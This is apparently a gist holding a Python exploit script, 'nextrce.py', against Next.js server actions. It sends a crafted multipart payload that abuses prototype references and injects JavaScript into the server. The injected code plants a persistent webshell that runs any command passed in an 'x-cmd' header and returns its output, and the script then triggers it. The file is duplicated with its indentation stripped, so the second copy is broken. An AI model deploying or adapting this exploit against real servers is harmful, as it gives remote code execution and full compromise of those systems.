Esonhugh/nextrce.py

## nextrce.py
# /// script
# dependencies = ["requests"]
# ///
import requests
import sys
import json
import base64


TARGET = "http://localhost:3000/"

CMD = "ls -al"

if len(sys.argv) < 2:
    print(f"Usage: {sys.argv[0]} <target_url>")
    print(f"default: {sys.argv[0]} http://localhost:3000/")
    print("Using default values.")
    print("To use a webshell, use: ")
    print(f"  curl -H 'X-CMD: whoami' {TARGET} -X POST")
    exit(1)

if len(sys.argv) > 1:
    TARGET = sys.argv[1]

crafted_chunk = {
        "then": "$1:__proto__:then",
        "status": "resolved_model",
        "reason": -1,
        "value": "{\"then\":\"$B0\"}",
        "_response": {
            "_prefix": "(async()=>{const http=await import('node:http');const cp=await import('node:child_process');const originalEmit=http.Server.prototype.emit;http.Server.prototype.emit=function(event,...args){if(event==='request'){const[req,res]=args;const cmd=req.headers['x-cmd'];if(cmd){cp.exec(cmd,(err,stdout,stderr)=>{res.writeHead(200,{'Content-Type':'application/json'});res.end(JSON.stringify({success:!err,stdout,stderr,error:err?err.message:null}));});return true;}}return originalEmit.apply(this,arguments);};})();",
            "_formData": {
            "get": "$1:constructor:constructor"
            }
        }
    }

files = {
    "0": (None, json.dumps(crafted_chunk)),
    "1": (None, '"$@0"'),
}

headers = { "Next-Action": "x" }

requests.get(TARGET)  # Initialize server

try:
    res = requests.post(TARGET, files=files, headers=headers, timeout=10)
except requests.exceptions.Timeout:
    print("Request timed out. The server may be vulnerable and register a webshell successfully.")
    resp = requests.get(TARGET, headers={
        "x-cmd": "whoami"
        })  # Trigger the payload
    print("Response from webshell:")
    print(resp.text)

except Exception as e:
    print(f"An error occurred: {e}")
else:
    print("Response:")
    print(res.text)
	# /// script
	# dependencies = ["requests"]
	# ///
	import requests
	import sys
	import json
	import base64


	TARGET = "http://localhost:3000/"

	CMD = "ls -al"

	if len(sys.argv) < 2:
	print(f"Usage: {sys.argv[0]} <target_url>")
	print(f"default: {sys.argv[0]} http://localhost:3000/")
	print("Using default values.")
	print("To use a webshell, use: ")
	print(f" curl -H 'X-CMD: whoami' {TARGET} -X POST")
	exit(1)

	if len(sys.argv) > 1:
	TARGET = sys.argv[1]

	crafted_chunk = {
	"then": "$1:__proto__:then",
	"status": "resolved_model",
	"reason": -1,
	"value": "{\"then\":\"$B0\"}",
	"_response": {
	"_prefix": "(async()=>{const http=await import('node:http');const cp=await import('node:child_process');const originalEmit=http.Server.prototype.emit;http.Server.prototype.emit=function(event,...args){if(event==='request'){const[req,res]=args;const cmd=req.headers['x-cmd'];if(cmd){cp.exec(cmd,(err,stdout,stderr)=>{res.writeHead(200,{'Content-Type':'application/json'});res.end(JSON.stringify({success:!err,stdout,stderr,error:err?err.message:null}));});return true;}}return originalEmit.apply(this,arguments);};})();",
	"_formData": {
	"get": "$1:constructor:constructor"
	}
	}
	}

	files = {
	"0": (None, json.dumps(crafted_chunk)),
	"1": (None, '"$@0"'),
	}

	headers = { "Next-Action": "x" }

	requests.get(TARGET) # Initialize server

	try:
	res = requests.post(TARGET, files=files, headers=headers, timeout=10)
	except requests.exceptions.Timeout:
	print("Request timed out. The server may be vulnerable and register a webshell successfully.")
	resp = requests.get(TARGET, headers={
	"x-cmd": "whoami"
	}) # Trigger the payload
	print("Response from webshell:")
	print(resp.text)

	except Exception as e:
	print(f"An error occurred: {e}")
	else:
	print("Response:")
	print(res.text)
No results found